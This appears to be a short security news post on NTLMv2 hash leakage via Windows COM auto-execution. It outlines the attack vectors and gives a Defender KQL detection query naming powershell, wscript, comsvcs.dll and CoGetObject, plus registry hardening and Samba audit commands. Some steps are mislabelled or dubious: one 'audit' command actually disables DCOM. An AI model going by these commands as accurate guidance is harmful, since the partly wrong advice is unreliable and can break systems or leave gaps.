NTLMv2 Hash Leak via COM Auto-Execution Detection

By /

Listen to this Post

Featured Image
A critical vulnerability has been discovered where attackers can exploit Windows COM objects and auto-execution paths to silently leak NTLMv2 hashes without requiring exotic payloads. This technique leverages trusted system components, making detection challenging.

Reference:

You Should Know:

How the Exploit Works

Attackers abuse COM objects and auto-execution mechanisms to force a system into sending NTLMv2 authentication hashes to a malicious server. This can be done via:
– Malicious Office documents
– Scripts triggering COM objects
– UNC path injection

Detection & Mitigation

KQL Query for Defender XDR

DeviceProcessEvents 
| where InitiatingProcessFileName =~ "powershell.exe" or InitiatingProcessFileName =~ "wscript.exe" 
| where FileName =~ "comsvcs.dll" or ProcessCommandLine has "CoGetObject" 
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine

Windows Security Hardening

1. Disable NTLMv1 & Weak NTLMv2 Usage:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5

2. Block Outbound NTLM:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value 2

3. Audit COM Object Access:

reg add "HKLM\SOFTWARE\Microsoft\Ole" /v "EnableDCOM" /t REG_SZ /d "N" /f

Linux-Based Monitoring (If Using Samba/Winbind)

sudo auditctl -w /var/lib/samba/ -k samba_ntlm 
sudo ausearch -k samba_ntlm | grep NTLM

What Undercode Say

This attack highlights the risks of legacy authentication protocols like NTLM. While disabling NTLM entirely is ideal, organizations must balance security with compatibility. Implementing strict NTLM policies, monitoring COM object usage, and leveraging KQL-based detections can mitigate risks.

Expected Output:

  • Detection of suspicious COM object executions
  • Blocked NTLM hash leaks via Defender XDR
  • Logged events in Windows Security logs (Event ID 4624, 4648)

Prediction

As attackers increasingly abuse trusted Windows components, Microsoft may enforce stricter default NTLM policies in future updates, pushing enterprises toward Kerberos-only authentication.

IT/Security Reporter URL:

Reported By: 0x534c Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: